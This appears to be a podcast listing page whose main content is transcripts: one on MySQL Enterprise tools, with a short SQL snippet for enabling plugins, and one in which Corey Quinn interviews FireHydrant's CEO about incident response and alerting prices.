without having to disclose their source code as required by GPL v2.
This ensures that whenever there is an issue, Oracle Support can provide the needed help without any delay. There are no restrictions on how many times customers can receive help from the team because MySQL Enterprise Support allows for unlimited incidents. MySQL Enterprise Support goes beyond simply fixing issues. It also offers guidance and advice. Whether customers require assistance with performance tuning or troubleshooting, the team is there to support them every step of the way. 09:27 Lois: Perside, can you walk us through the various tools and advanced features that are available within MySQL? Maybe we could start with MySQL Shell. Perside: MySQL Shell is an integrated client tool used for all MySQL database operations and administrative functions. It's a top choice among MySQL users for its versatility and powerful features. MySQL Shell offers multi-language support for JavaScript, Python, and SQL. These naturally scriptable languages make coding flexible and efficient. They also allow developers to use their preferred programming language for everything, from automating database tasks to writing complex queries. MySQL Shell supports both document and relational models. Whether your project needs the flexibility of NoSQL's document-oriented structures or the structured relationships of traditional SQL tables, MySQL Shell manages these different data types without any problems. Another key feature of MySQL Shell is its full access to both development and administrative APIs. This ability makes it easy to automate complex database operations and do custom development directly from MySQL Shell. MySQL Shell excels at DBA operations. It has extensive tools for database configuration, maintenance, and monitoring. These tools not only improve the efficiency of managing databases, but they also reduce the possibility of human error, making MySQL databases more reliable and easier to manage. 11:37 Nikita: What about the MySQL Server tool? I know that it is the core of the MySQL ecosystem and is available in both the community and commercial editions. But how does it enhance the MySQL experience? Perside: It connects with various devices, applications, and third-party tools to enhance its functionality. The server manages both SQL for structured data and NoSQL for schemaless applications. It has many key components: the parser, which interprets SQL commands; the optimizer, which ensures efficient query execution; and the caches and buffer pools, which reduce disk usage and speed up access. InnoDB, the default storage engine, maintains data integrity and supports robust transaction and recovery mechanisms. MySQL is designed for scalability and reliability. With features like replication and clustering, it distributes data, manages more users, and ensures consistent uptime. 13:00 Nikita: What role does MySQL Enterprise Edition play in MySQL server's capabilities? Perside: MySQL Enterprise Edition improves MySQL server by adding a suite of commercial extensions. These exclusive tools and services are designed for enterprise-level deployments and challenging environments. These tools and services include secure online backup. It keeps your data safe with efficient backup solutions. Real-time monitoring provides insight into database performance and health. The seamless integration connects easily with existing infrastructure, improving data flow and operations. Then you have the 24/7 expert support. It offers round-the-clock assistance to optimize and troubleshoot your databases.
14:04 Lois: That's an extensive list of features. Now, can you explain what MySQL Enterprise plugins are? I know they're specialized extensions that boost the capabilities of MySQL server, tools, and services, but I'd love to know a little more about how they work. Perside: Each plugin serves a specific purpose. The firewall plugin protects against SQL injection by allowing only pre-approved queries. The audit plugin logs database activities, tracking who accesses databases and what they do. The encryption plugin secures data at rest, protecting it from unauthorized access. Then we have the authentication plugin, which integrates with systems like LDAP and Active Directory for access control. Finally, the thread pool plugin optimizes performance in high-load situations by effectively controlling how many execution threads are used and how long they run. The plugins and tools are included in the MySQL Enterprise Edition suite. 15:32 Join the Oracle University Learning Community and tap into a vibrant network of over 1 million members, including Oracle experts and fellow learners. This dynamic community is the perfect place to grow your skills, connect with likeminded learners, and celebrate your successes. As a MyLearn subscriber, you have access to engage with your fellow learners and participate in activities in the community. Visit community.oracle.com/ou to check things out today! 16:03 Nikita: Welcome back! We've been going through the various MySQL tools, and another important one is MySQL Enterprise Backup, right? Perside: MySQL Enterprise Backup is a powerful tool that offers online, non-blocking backup and recovery. It makes sure databases remain available and perform optimally during the backup process. It also includes advanced features, such as incremental and differential backups. Additionally, MySQL Enterprise Backup supports compression to reduce backup sizes and encryption to keep data secure. One of the standard capabilities of MySQL Enterprise Backup is its seamless integration with media management software, or MMS. This integration simplifies the process of managing and storing backups, ensuring that data is easily accessible and secure. Then we have MySQL Workbench Enterprise. It enhances database development and design with robust tools for creating and managing diagrams and ensuring proper documentation. It simplifies data migration with powerful tools that make it easy to move databases between platforms. For database administration, MySQL Workbench Enterprise offers efficient tools for monitoring, performance tuning, user management, and backup and recovery. MySQL Enterprise Monitor is another tool. It provides real-time MySQL performance and availability monitoring. It helps track a database's health and performance. It visually finds and fixes problem queries. This is to make it easy to identify and address performance issues. It offers MySQL best-practice advisors to guide users in maintaining optimal performance and security. Lastly, MySQL Enterprise Monitor is proactive and provides forecasting. 18:40 Lois: Oh, that's really going to help users stay ahead of potential issues. That's fantastic! What about the Oracle Enterprise Manager Plugin for MySQL? Perside: This one offers availability and performance monitoring to make sure MySQL databases are running smoothly and efficiently. It provides configuration monitoring. This is to help keep track of the database settings and configuration.
Finally, it collects all available metrics to provide comprehensive insight into database operations. 19:19 Lois: Are there any tools designed to handle higher loads and improve security? Perside: MySQL Enterprise Thread Pool improves scalability as concurrent connections grow. It makes sure the database can handle increased loads efficiently. MySQL Enterprise Authentication is another tool. This one integrates MySQL with existing security infrastructures. It provides robust security solutions. It supports Linux PAM, LDAP, Windows, Kerberos, and even FIDO for passwordless authentication. 20:02 Nikita: Do any tools offer benefits like customized logging, data protection, database security? Perside: MySQL Enterprise Audit provides out-of-the-box logging of connections, logins, and queries in XML or JSON format. It also offers simple to fine-grained policies for filtering and log rotation. This is to ensure comprehensive and customizable logging. MySQL Enterprise Firewall detects and blocks out-of-policy database transactions. This is to protect your data from unauthorized access and activities. We also have MySQL Enterprise Asymmetric Encryption. It uses MySQL encryption libraries for key management, signing, and verifying data. It ensures data stays secure during handling. MySQL Transparent Data Encryption, another tool, provides data-at-rest encryption within the database. The master key is stored outside of the database in a KMIP 1.1-compliant key vault. That is to improve database security. Finally, MySQL Enterprise Masking offers masking capabilities, including string masking and dictionary replacement. This ensures sensitive data is protected by obscuring it. It also provides random data generators, such as range-based, payment card, email, and social security number generators. These tools help create realistic but anonymized data for testing and development. 22:12 Lois: Can you tell us about HeatWave, the MySQL cloud service? We're going to have a whole episode dedicated to it soon, but just a quick introduction for now would be great. Perside: MySQL HeatWave offers a fully managed MySQL service. It provides deployment, backup and restore, high availability, resizing, and read replicas, all the features you need for efficient database management. This service is a powerful union of Oracle Infrastructure and MySQL Enterprise Edition 8. It combines robust performance with top-tier infrastructure. With MySQL HeatWave, your systems are always up to date with the latest security fixes, ensuring your data is always protected. Plus, it supports both OLTP and analytics/ML use cases, making it a versatile solution for diverse database needs.
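A sketch of how server-side plugins like the ones discussed above are typically enabled, using plugin and library names from Enterprise Edition on Linux (Windows builds use .dll instead of .so):

-- Enable the Enterprise Thread Pool and PAM authentication plugins
INSTALL PLUGIN thread_pool SONAME 'thread_pool.so';
INSTALL PLUGIN authentication_pam SONAME 'authentication_pam.so';
-- Confirm they are active
SELECT PLUGIN_NAME, PLUGIN_STATUS FROM INFORMATION_SCHEMA.PLUGINS
WHERE PLUGIN_NAME IN ('thread_pool', 'authentication_pam');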
Additionally, it provides direct contact with the MySQL team for expert guidance. In terms of DevOps agility, it supports automated scaling and management, as well as flexible real-time backups, making it ideal for agile development environments. Finally, concerning customer satisfaction, it enhances application performance and uptime, ensuring your customers have a reliable and smooth experience. 25:18 Lois: Thank you so much, Perside. This is really insightful information. To learn more about all the support services that are available, visit support.oracle.com. This is the central hub for all MySQL Enterprise Support resources.  Nikita: Yeah, and if you want to know about the key commercial products offered by MySQL, visit mylearn.oracle.com and search for the MySQL 8.4: Essentials course. Join us next week for a discussion on installing MySQL. Until then, this is Nikita Abraham… Lois: And Lois Houston signing off! 25:53 That's all for this episode of the Oracle University Podcast. If you enjoyed listening, please click Subscribe to get all the latest episodes. We'd also love it if you would take a moment to rate and review us on your podcast app. See you again on the next episode of the Oracle University Podcast.

ScanNetSecurity 最新セキュリティ情報
Okta discloses a vulnerability in AD/LDAP delegated authentication affecting usernames of 52 characters or longer

ScanNetSecurity 最新セキュリティ情報

Play Episode Listen Later Nov 5, 2024 0:14


On October 17, Okta Japan and the OpenID Foundation announced the formation of a working group to develop "IPSIE," a new identity security standard for SaaS applications.

Anerzählt
LDAP 636 =^_^=

Anerzählt

Play Episode Listen Later Jun 3, 2024 7:23


The LDAP protocol is just one of many network protocols, and what they all have in common is that they communicate via a network address and port...

The PowerShell Podcast
From Python to PowerShell: A Developer's Perspective with Jordan Borean

The PowerShell Podcast

Play Episode Listen Later Jan 22, 2024 54:20


In this episode of the PowerShell Podcast, we are joined by the talented Jordan Borean. Join us as we delve into the world of PowerShell development with Jordan, exploring some of his exceptional modules that have made waves in the community. Jordan shares his unique perspective as a Python developer using PowerShell and highlights the benefits of binary modules. Dive into the details of Jordan's experience within the PowerShell community Discord, and gain insights into his journey to Red Hat, where Open Source played a pivotal role. As a bonus, discover the surprising answer to the question: If PowerShell was a song, what would it be? This episode is packed with coding wisdom, community adventures, and a touch of musical revelation.
Guest Bio and links: I've been working in IT for around 10 years now with experience in a range of roles. Currently, I'm a programmer working on Ansible for RedHat, specializing in Windows automation. While my job is mostly working with Python I play around with PowerShell and C# mostly in my spare time and have written quite a few PowerShell modules. In my spare time, I like to spend time with my wife and dog as well as go on some bike rides around where I live. I currently specialize in network protocols like WinRM, SMB, PSRemoting, LDAP, among others, and I have written a few cross-platform clients that implement these protocols outside of Windows. I'm also quite active in the Discord community and love to help/lurk the various questions that come up there. There's always something new that I learn.
Watch the PowerShell Podcast on YouTube: https://www.youtube.com/watch?v=iTFr1ojayTM
https://2pintsoftware.com/news/details/why-is-add-content-bad-in-powershell-51
https://github.com/JustinGrote/ModuleFast/releases/tag/v0.1.0
https://lindnerbrewery.github.io/posts/converting_to_semtantic_version/
https://github.com/jborean93/PowerShell-ctypes
https://github.com/jborean93/PSDetour
https://github.com/jborean93/PSDetour-Hooks
https://github.com/jborean93/PSEtw
https://github.com/jborean93/PSOpenAD
https://github.com/ansible-collections/ansible.windows
https://github.com/ansible-collections/community.windows
https://github.com/ansible-collections/microsoft.ad
https://github.com/SeeminglyScience/ImpliedReflection
https://github.com/JustinGrote/ModuleFast/
https://github.com/SeeminglyScience/ClassExplorer
https://github.com/pester/Pester

Self-Hosted
114: Unintended Consequences

Self-Hosted

Play Episode Listen Later Jan 13, 2024 61:48


Nextcloud Upgrade, Android Tablet Experiment, Jellystat, OpenSSH 9.5, Audiobookshelf, StirlingPDF, Lubelog, Tailscale Integration, Apple Notes Killer, Memos, Reverse Proxy, Zigbee Plugs Recommendation Sponsored By: Tailscale: Tailscale is a Zero config VPN. It installs on any device in minutes, manages firewall rules for you, and works from anywhere. Get 3 users and 100 devices for free. Support Self-Hosted Links: ⚡ Grab Sats with Strike Around the World — Strike is a lightning-powered app that lets you quickly and cheaply grab sats in over 36 countries.

FOCUS ON: Linux
Linux in the Windows Cage

FOCUS ON: Linux

Play Episode Listen Later Dec 13, 2023 19:01


One of Linux's strengths is that it can be integrated into existing networks with relative ease. For example, there are several tools for using Linux hosts with Microsoft directory services - and Microsoft's own MDM solution now supports Linux as well. We also have a tip ready on the subject of enterprise security.

Screaming in the Cloud
Creating Value in Incident Management with Robert Ross

Screaming in the Cloud

Play Episode Listen Later Dec 5, 2023 35:09


Robert Ross, CEO and Co-Founder at FireHydrant, joins Corey on Screaming in the Cloud to discuss how being an on-call engineer fighting incidents inspired him to start his own company. Robert explains how FireHydrant does more than just notify engineers of an incident, but also helps them to be able to effectively put out the fire. Robert tells the story of how he “accidentally” started a company as a result of a particularly critical late-night incident, and why his end goal at FireHydrant has been and will continue to be solving the problem, not simply choosing an exit strategy. Corey and Robert also discuss the value and pricing models of other incident-reporting solutions and Robert shares why he feels surprised that nobody else has taken the same approach FireHydrant has. About Robert: Robert Ross is a recovering on-call engineer, and the CEO and co-founder at FireHydrant. As the co-founder of FireHydrant, Robert plays a central role in optimizing incident response and ensuring software system reliability for customers. Prior to founding FireHydrant, Robert previously contributed his expertise to renowned companies like Namely and Digital Ocean. Links Referenced: FireHydrant: https://firehydrant.com/ Twitter: https://twitter.com/bobbytables Transcript: Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud. Corey: Developers are responsible for more than ever these days. Not just the code they write, but also the containers and cloud infrastructure their apps run on. And a big part of that responsibility is app security — from code to cloud. That's where Snyk comes in. Snyk is a frictionless security platform that meets teams where they are, automating application security controls across their existing tools, workflows, and the AWS application stack — including seamless integrations with AWS CodePipeline, Amazon EKS, Amazon Inspector and several others. I'm a customer myself. Deploy on AWS. Secure with Snyk. Learn more at snyk.co/scream. That's S-N-Y-K-dot-C-O/scream. Corey: Welcome to Screaming in the Cloud, I'm Corey Quinn. And this featured guest episode is brought to us by our friends at FireHydrant and for better or worse, they've also brought us their CEO and co-founder, Robert Ross, better known online as Bobby Tables. Robert, thank you for joining us. Robert: Super happy to be here. Thanks for having me. Corey: Now, this is the problem that I tend to have when I've been tracking companies for a while, where you were one of the only people that I knew of at FireHydrant. And you kind of still are, so it's easy for me to imagine that, oh, it's basically your own side project that turned into a real job, sort of, side hustle that's basically you and maybe a virtual assistant or someone. I have it on good authority—and it was also signaled by your Series B—that there might be more than just you over there now. Robert: Yes, that's true. There's a little over 60 people now at the company, which is a little mind-boggling for me, starting from side projects, building this in Starbucks to actually having people using the thing and being on payroll. So, a little bit of a crazy thing for me. But yes, over 60. Corey: So, I have to ask, what is it you folks do?
When you say ‘fire hydrant,' the first thing that I think of is when I was a kid getting yelled at by the firefighter for messing around with something I probably shouldn't have been messing around with. Robert: So, it's actually very similar where I started it because I was messing around with software in ways I probably shouldn't have and needed a fire hydrant to help put out all the fires that I was fighting as an on-call engineer. So, the name kind of comes from what do you need when you're putting out a fire? A fire hydrant. So, what we do is we help people respond to incidents really quickly, manage them from ring to retro. So, the moment you declare an incident, we'll do all the timeline tracking and eventually help you create a retrospective at the very end. And it's been a labor of love because all of that was really painful for me as an engineer. Corey: One of the things that I used to believe was that every company did something like this—and maybe they do, maybe they don't—I'm noticing these days an increasing number of public companies will never admit to an incident that very clearly ruined things for their customers. I'm not sure if they're going to talk privately to customers under NDAs and whatnot, but it feels like we're leaving an era where it was an expectation that when you had a big issue, you would do an entire public postmortem explaining what had happened. Is that just because I'm not paying attention to the right folks anymore, or are you seeing a downturn in that? Robert: I think that people are skittish of talking about how much reliability they—or issues they may have because we're having this weird moment where people want to open more incidents like the engineers actually want to say we have more incidents and officially declare those, and in the past, we had these, like, shadow incidents that we weren't officially going to say it was an incident, but was a pretty big deal, but we're not going to have a retro on it so it's like it didn't happen. And kind of splitting the line between what's a SEV1, when should we actually talk about this publicly, I think companies are still trying to figure that out. And then I think there's also opposing forces. We talk to folks and it's, you know, public relations will sometimes get involved. My general advice is, like, you should be probably talking about it no matter what. That's how you build trust. Trust, with incidents, is lost in buckets and gained back in drops, so you should be more public about it. And I think my favorite example is a major CDN had a major incident and it took down, like, the UK government website. And folks can probably figure out who I'm talking about, but their stock went up the next day. You would think that a major incident taking down a large portion of the internet would cause your stock to go down. Not the case. They were on it like crazy, they communicated about it like crazy, and lo and behold, you know, people were actually pretty okay with it as far as they could be at the end of the day. Corey: The honest thing that really struck me about that was I didn't realize that CDN that you're referencing was as broadly deployed as it was. Amazon.com took some downtime as a result of this. Robert: Yeah. Corey: It's, “Oh, wow. If they're in that many places, I should be taking them more seriously,” was my takeaway. And again, I don't tend to shame folks for incidents because as soon as you do that, they stop talking about them.
They still have them, but then we all lose the ability to learn from them. I couldn't help but notice that the week that we're recording this, so there was an incident report put out by AWS for a Lambda service event in Northern Virginia. It happened back in June, we're recording this late in October. So, it took them a little bit of time to wind up getting it out the door, but it's very thorough, very interesting as far as what it talks about as far as their own approach to things. Because otherwise, I have to say, it is easy as a spectator slash frustrated customer to assume the absolute worst. Like, you're sitting around there and like, “Well, we have a 15-minute SLA on this, so I'm going to sit around for 12 minutes and finish my game of solitaire before I answer the phone.” No, it does not work that way. People are scrambling behind the scenes because as systems get more complicated, understanding the interdependencies of your own system becomes monstrous. I still remember some of the very early production engineering jobs that I had where—to what you said a few minutes ago—oh, yeah, we'll just open an incident for every alert that goes off. Then we dropped a [core switch 00:05:47] and Nagios sent something like 8000 messages inside of two minutes. And we would still, 15 years later, not be done working through that incident backlog had we done such a thing. All of this stuff gets way harder than you would expect as soon as your application or environment becomes somewhat complicated. And that happens before you realize it. Robert: Yeah, much faster. I think that, in my experience, there's a moment that happens for companies where maybe it's the number of customers you have, number of servers you're running in production, that you have this, like, “Oh, we're running a big workload right now in a very complex system that impacts people's lives, frankly.” And the moment that companies realize that is when you start to see, like, oh, process change, you build it, you own it, now we have an SRE team. Like, there's this catalyst that happens in all of these companies that triggers this. And it's—I don't know, from my perspective, it's coming at a faster rate than people probably realize. Corey: From my perspective, I have to ask you this question, and my apologies in advance if it's one of those irreverent ones, but do you consider yourself to be an observability company? Robert: Oh, great question. No. No, actually. We think that we are the baton handoff between an observability tool and our platform. So, for example, we think that that's a good way to kind of, you know, as they say, monitor the system, give reports on that system, and we are the tool that based on that monitor may be going off, you need to do something about it. So, for example, I think of it as like a smoke detector in some cases. Like, in our world, like that's—the smoke detector is the thing that's kind of watching the system and if something's wrong, it's going to tell you. But at that point, it doesn't really do anything that's going to help you in the next phase, which is managing the incident, calling 911, driving to the scene of the fire, whatever analogies you want to use.
But I think the value-add for the observability tools and what they're delivering for businesses is different than ours, but we touch each other, like, very much so. Corey: Managing an incident when something happens and diagnosing what is the actual root cause of it, so to speak—quote-unquote, “Root cause.” I know people have very strong opinions on—Robert: Yeah, say the word [laugh]. Corey: —that phrase—exactly—it just doesn't sound that hard. It is not that complicated. It's, more or less, a bunch of engineers who don't know what they're actually doing, and why are they running around chasing this stuff down is often the philosophy of a lot of folks who have never been in the trenches dealing with these incidents themselves. I know this because before I was exposed to scale, that's what I thought and then, oh, this is way harder than you would believe. Now, for better or worse, an awful lot of your customers and the executives at those customers did, for some strange reason, not come up through production engineering as the thing that they've done. They are executives, so it feels like it would be a challenging conversation to have with them, but one thing that you've got in your back pocket, which I always love talking to folks about, is before this, you were an engineer and then you became a CEO of a reasonably-sized company. That is a very difficult transition. Tell me about it. Robert: Yeah. Yeah, so a little of that background. I mean, I started writing code—I've been writing code for two-thirds of my life. So, I'm 32 now; I'm relatively young. And my first job out of high school—skipping college entirely—was writing code. I was 18, I was working in a web dev shop, I was making good enough money and I said, you know what? I don't want to go to college. That sounds—I'm making money. Why would I go to college? And I think it was a good decision because I got to be able—I was right kind of in the centerpiece of when a lot of really cool software things were happening. Like, DevOps was becoming a really cool term and we were seeing the cloud kind of emerge at this time and become much more popular. And it was a good opportunity to see all this confluence of technology and people and processes emerge into what is, kind of like, the base plate for a lot of how we build software today, starting in 2008 and 2009. And because I was an on-call engineer during a lot of that, and building the systems as well, that I was on call for, it meant that I had a front-row seat to being an engineer that was building things that was then breaking, and then literally merging on GitHub and then five minutes later [laugh], seeing my phone light up with an alert from our alerting tool. Like, I got to feel the entire process. And I think that that was nice because eventually one day, I snapped. And it was after a major incident, I snapped and I said, “There's no tool that helps me during this incident. There's no tool that kind of helps me run a process for me.” Because the only thing I care about in the middle of the night is going back to bed. I don't have any other priority [laugh] at 2 a.m. So, I wanted to solve the problem of getting to the fire faster and extinguishing it by automating as much as I possibly could.
The process that was given to me in an outdated Confluence page or Google Doc, whatever it was, I wanted to automate that part so I could do the thing that I was good at as an engineer: put out the fire, take some notes, and then go back to bed, and then do a retrospective sometime next day or in that week. And it was a good way to kind of feel the problem, try to build a solution for it, tweak a little bit, and then it kind of became a company. I joke and I say on accident, actually. Corey: I'll never forget one of the first big, hairy incidents that I had to deal with in 2009, where my coworker had just finished migrating the production environment over to LDAP on a Thursday afternoon and then stepped out for a three-day weekend, and half an hour later, everything started exploding because LDAP will do that. And I only had the vaguest idea of how LDAP worked at all. This was a year into my first Linux admin job; I'd been a Unix admin before that. And I suddenly have the literal CEO of the company breathing down my neck behind me trying to figure out what's going on and I have no freaking idea myself. And it was… feels like there's got to be a better way to handle these things. We got through. We wound up getting it back online, no one lost their job over it, but it was definitely a touch-and-go series of hours there. And that was a painful thing. And you and I went in very different directions based upon experiences like that. I took a few more jobs where I had even worse on-call schedules than I would have believed possible until I started this place, which very intentionally is centered around a business problem that only exists during business hours. There is no 2 a.m. AWS billing emergency. There might be a security issue masquerading as one of those, but you don't need to reach me out of business hours because anything that is a billing problem will be solved in Seattle's timeline over a period of weeks. You leaned into it and decided, oh, I'm going to start a company to fix all of this. And okay, on some level, some wit that used to work here, wound up once remarking that when an SRE doesn't have a better idea, they start a monitoring company. Robert: [laugh]. Corey: And, on some level, there's some validity to it because this is the problem that I know, and I want to fix it. But you've differentiated yourself in a few key ways. As you said earlier, you're not an observability company. Good for you. Robert: Yeah. That's a funny quote. Corey: Pete Cheslock. He has a certain way with words. Robert: Yeah [laugh]. I think that when we started the company, it was—we kind of accidentally secured funding five years ago. And it was because this genuinely was something I just, I bought a laptop for because I wanted to own the IP. I always made sure I was on a different network, if I was going to work on the company and the tool. And I was just writing code because I just wanted to solve the problem. And then some crazy situation happened where, like, an investor somehow found FireHydrant because they were like, “Oh, this SRE thing is a big space and incidents is a big part of it.” And we got to talking and they were like, “Hey, we think what you're building is valuable and we think you should build a company here.” And I was—like, you know, the Jim Carrey movie, Yes Man? Like, that was kind of me in that moment. I was like, “Sure.” And here we are five years later.
But I think the way that we approached the problem was let's just solve our own problem and let's just build a company that we want to work at. And you know, I had two co-founders join me in late 2018 and that's what we told ourselves. We said, like, “Let's build a company that we want to work for, that solves problems that we have had, that we care about solving.” And I think it's worked out, you know? We work with amazing companies that use our tool—much to their chagrin [laugh]—multiple times a day. It's kind of a problem when you build an incident response tool is that it's a good thing when people are using it, but a bad thing for them. Corey: I have to ask of all of the different angles to approach this from, you went with incident management as opposed to focusing on something that is more purely technical. And I don't say that in any way that is intended to be sounding insulting, but it's easier from an engineering mind to—having been one myself—to come up with, “Here's how I make one computer talk to his other computer when the following event happens.” That's a much easier problem by orders of magnitude than here's how I corral the humans interacting with that computer's failure to talk to another computer in just the right way. How did you get onto this path? Robert: Yeah. The problem that we were trying to solve for it was the getting the right people in the room problem. We think that building services that people own is the right way to build applications that are reliable and stable and easier to iterate on. Put the right people that build that software, give them, like, the skin in the game of also being on call. And what that meant for us is that we could build a tool that allowed people to do that a lot easier where allowing people to corral the right people by saying, “This service is broken, which powers this functionality, which means that these are the people that should get involved in this incident as fast as possible.” And the way we approached that is we just built up part of our functionality called Runbooks, where you can say, “When this happens, do this.” And it's catered for incidents. So, there's other tools out there, you can kind of think of as, like, we're a workflow tool, like Zapier, or just things that, like, fire webhooks at services you build and that ends up being your incident process. But for us, we wanted to make it, like, a really easy way that a project manager could help define the process in our tool. And when you click the button and say, “Declare Incident: LDAP is Broken,” and I have a CEO standing behind me, our tool just would corral the people for you. It was kind of like a bat signal in the air, where it was like, “Hey, there's this issue. I've run all the other process. I just need you to arrive at and help solve this problem.” And we think of it as, like, how can FireHydrant be a mech suit for the team that owns incidents and is responsible for resolving them? Corey: There are a few easier ways to make a product sound absolutely ridiculous than to try and pitch it to a problem that it is not designed to scale to. What is the ‘you must be at least this tall to ride' envisioning for FireHydrant? How large slash complex of an organization do you need to be before this starts to make sense? Because I promise, as one person with a single website that gets no hits, that is probably not the best place for—Robert: Probably not. Corey: To imagine your ideal user persona. Robert: Well, I'm sure you get way more hits than that.
Come on [laugh]. Corey: It depends on how controversial I'm being in a given week. Robert: Yeah [laugh]. Corey: Also, I have several ridiculous, nonsense apps out there, but honestly, those are for fun. I don't charge people for them, so they can deal with my downtime till I get around to it. That's the way it works. Robert: Or, like, spite-visiting your website. No it's—for us, we think that the ‘must be this tall' is when do you have, like, sufficiently complicated incidents? We tell folks, like, if you're a ten-person shop and you have incidents, you know, just use our free tier. Like, you need something that opens a Slack channel? Fine. Use our free tier or build something that hits the Slack API [unintelligible 00:18:18] channel. That's fine. But when you start to have a lot of people in the room and multiple pieces of functionality that can break and multiple people on call, that's when you probably need to start to invest in incident management. Because it is a return on investment, but there is, like, a minimum amount of incidents and process challenges that you need to have before that return on investment actually, I would say, comes to fruition. Because if you do think of, like, an incident that takes downtime, or you know, you're a retail company and you go down for, let's say, ten minutes, and your number of sales per hour is X, it's actually relatively simple for that type of company to understand, okay, this is how much impact we would need to have from an incident management tool for it to be valuable. And that waterline is actually way—it's way lower than I think a lot of people realize, but like you said, you know, if you have a few hundred visitors a day, it's probably not worth it. And I'll be honest there, you can use our free tier. That's fine. Corey: Which makes sense. It's challenging to wind up sizing things appropriately. Whenever I look at a pricing page, there are two things that I look for. And incidentally, when I pull up someone's website, I first make a beeline for pricing because that is the best way I found for a lot of the marketing nonsense words to drop away and get down to brass tacks. And the two things I want are free tier or zero-dollar trial that I can get started with right now because often it's two in the morning and I'm trying to see if this might solve a problem that I'm having. And I also look for the enterprise tier ‘contact us' because there are big companies that do not do anything that is not custom nor do they know how to sign a check that doesn't have two commas in it. And whatever is between those two, okay, that's good to look at to figure out what dimensions I'm expected to grow on and how to think about it, but those are the two tent poles. And you've got that, but pricing is always going to be a dark art. What I've been seeing across the industry. And if we put it under the broad realm of things that watch your site and alert you and help manage those things, there are an increasing number of, I guess what I want to call component vendors, where you'll wind up bolting together a couple dozen of these things together into an observability pipeline-style thing, and each component seems to be getting extortionately expensive. Most of the wake-up-in-the-middle-of-the-night services that will page you—and there are a number of them out there—at a spot check of these, they all cost more per month per user than Slack, the thing that most of us end up living within.
Corey: Which makes sense. It's challenging to wind up sizing things appropriately. Whenever I look at a pricing page, there are two things that I look for. And incidentally, when I pull up someone's website, I first make a beeline for pricing because that is the best way I've found for a lot of the marketing nonsense words to drop away and get down to brass tacks. And the two things I want are a free tier or zero-dollar trial that I can get started with right now, because often it's two in the morning and I'm trying to see if this might solve a problem that I'm having.

And I also look for the enterprise tier ‘contact us' because there are big companies that do not do anything that is not custom, nor do they know how to sign a check that doesn't have two commas in it. And whatever is between those two, okay, that's good to look at to figure out what dimensions I'm expected to grow on and how to think about it, but those are the two tent poles. And you've got that, but pricing is always going to be a dark art. What I've been seeing across the industry—and if we put it under the broad realm of things that watch your site and alert you and help manage those things—is an increasing number of, I guess what I want to call component vendors, where you'll wind up bolting a couple dozen of these things together into an observability pipeline-style thing, and each component seems to be getting extortionately expensive.

Most of the wake-up-in-the-middle-of-the-night services that will page you—and there are a number of them out there—at a spot check of these, they all cost more per month per user than Slack, the thing that most of us end up living within. This stuff gets fiendishly expensive, fiendishly quickly, and at some point, you're looking at this going, “The outage is cheaper than avoiding the outage through all of these things. What are we doing here?” What's going on in the industry, other than ‘money printing machine stopped going brrr' in quite the same way?

Robert: Yeah, I think that for alerting specifically—and this is a big part of, like, the journey that we wanted to have in FireHydrant; we also want to help folks with the alerting piece—I'll focus on that. I think that the industry around notifying people for incidents—texts, calls, push notifications, emails, there's a bunch of different ways to do it—I think where it gets really crazy expensive is in this per-seat model that most of them seem to have landed on. And we're per-seat for, like, the core platform of FireHydrant—so you know, before people spite-visit FireHydrant, look at our pricing page—but we're per-seat there because the value there is, like, we're the full platform for the service catalog, retrospectives, Runbooks; like, there's a whole other component of FireHydrant—status pages—but when it comes to alerting, like, in my opinion, that should be active-user based, for a few reasons. I think that if you're going to have people responding to incidents, and the value from us is making sure they get to that incident very quickly—because we wake them up in the middle of the night, we text them, we call them, we make their Hue lights turn red, whatever it is—then that's, like, the value that we're delivering at that moment in time, so that's how we should probably invoice you.

And I think that what's happened is that the pricing for these companies—they haven't innovated on the product in a way that allows them to package that any differently. So, what's happened, I think, is that the packaging of these products has been almost restrictive in the way that they could change their pricing models, because there's nothing much more to package on. It's like, cool, there's an alerting aspect to this, but that's what people want to buy those tools for. They want to buy the tool so it wakes them up. But that tool is getting more expensive.

There was even a price increase announced today for a big one [laugh] that I've been publicly critical of. That is crazy expensive for a tool that texts you and calls you. And what's going on now is people are looking at the pricing sheet for Twilio and going, “What the heck is going on?” Like, to send a text on Twilio in the United States is fractions of a penny, and here we are paying $40 a user for that person to receive six texts that month, because a webhook hit an HTTP server and it's supposed to call that person? That's kind of a crazy model if you think about it. Like, engineers are kind of going, “Wait a minute. What's up here?” And when engineers start thinking, “I could build this on a weekend,” like, something's wrong with that model. And I think that people are starting to think that way.
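For reference, the “weekend project” engineers are imagining really is about this small: a webhook endpoint plus Twilio's SMS API. A sketch with hypothetical credentials and phone numbers, and with everything that actually makes paging hard (schedules, escalation, retries, deduplication, delivery confirmation) deliberately missing:

```python
# pip install flask twilio
# The naive "I could build this on a weekend" pager. Credentials and
# numbers are placeholders; the hard parts are intentionally absent.
from flask import Flask, request
from twilio.rest import Client

app = Flask(__name__)
twilio = Client("ACxxxxxxxxxxxxxxxx", "your_auth_token")
ON_CALL = "+15550100"      # who to wake up
FROM_NUMBER = "+15550199"  # your Twilio number

@app.route("/alert", methods=["POST"])
def alert():
    payload = request.get_json(force=True, silent=True) or {}
    summary = payload.get("summary", "something broke")
    # One webhook in, one text out.
    twilio.messages.create(to=ON_CALL, from_=FROM_NUMBER, body=f"PAGE: {summary}")
    return "", 204
```

Which is exactly why a per-seat price that amounts to “six texts a month” invites the comparison.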
Corey: Well, engineers, to be fair, will think that about an awful lot of stuff.

Robert: Anything. Yeah, they [laugh]—

Corey: I've heard it said about Dropbox, Facebook, the internet—

Robert: Oh, Dropbox is such a good one.

Corey: BGP. Yeah okay, great. Let me know how that works out for you.

Robert: What was that Dropbox comment on Hacker News years ago? Like, “Just set up NFS and host it that way and it's easy.” Right?

Corey: Or rsync. Yeah—

Robert: Yeah, it was rsync.

Corey: What are you going to make with that? Like, who's going to buy that? Like, basically everyone, for at least a time.

Robert: And whether or not the engineers are right, I think, is a different point.

Corey: It's the condescending dismissal of everything that isn't writing the code that really galls, on some level.

